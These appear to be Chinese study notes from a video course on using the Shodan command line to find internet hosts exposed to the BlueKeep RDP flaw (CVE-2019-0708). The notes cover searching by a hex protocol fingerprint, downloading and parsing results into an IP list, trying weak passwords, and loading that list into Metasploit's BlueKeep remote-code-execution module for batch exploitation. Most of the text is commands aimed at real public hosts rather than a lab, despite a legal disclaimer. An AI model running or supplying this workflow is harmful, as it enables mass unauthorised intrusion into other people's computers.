shodan(2)

学习视频来自B站UP主泷羽sec，如涉及侵权马上删除文章。

笔记只是方便学习，以下内容只涉及学习内容，切莫逾越法律红线。

安全见闻，包含了各种网络安全，网络技术，旨在明白自己的渺小，知识的广博，要时时刻刻保持平等的心，很多分类组合有互相包含也属于正常情况，遇到问题就能够举一反三。

红队最常用的shodan参数，今天看看怎么查cve-2019-0708的漏洞

shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'(十六进制字符串，类似于指纹的方式去查找)

上面这串字符串就是cve-2019-0708的十六进制漏洞特征

shodan search vuln:cve-2019-0708,这条命令要更高权限，用上面的方法也可以批量刷洞

有漏洞不代表可以利用

用windows 远程连接，看主机是否存活

远程连接出现。测试弱口令。

metasploit进行批量的漏洞利用，msfconsole，很多工具。。。。:

        search 0708

        use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

        show options

        set rhost file:存有shodan扫出来的IP地址集文件

        check

注意几个点：

1.show options,看清payload，ip，端口

2.show targets,这漏洞支持windows7，sever这些，targets要设置正确

shodan两个参数：

1.download(下载)

shodan download -h(查看帮助文档)

shodan download 0708(下载到的文件名) --limit 10 [--fields ip_str,port](可删掉，没有过滤的必要) '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

2.parse（解析命令）（相当于解压工具）

shodan parse -h(查看帮助文档)

shodan parse --fields ip_str 'download下载的文件' > 0708.txt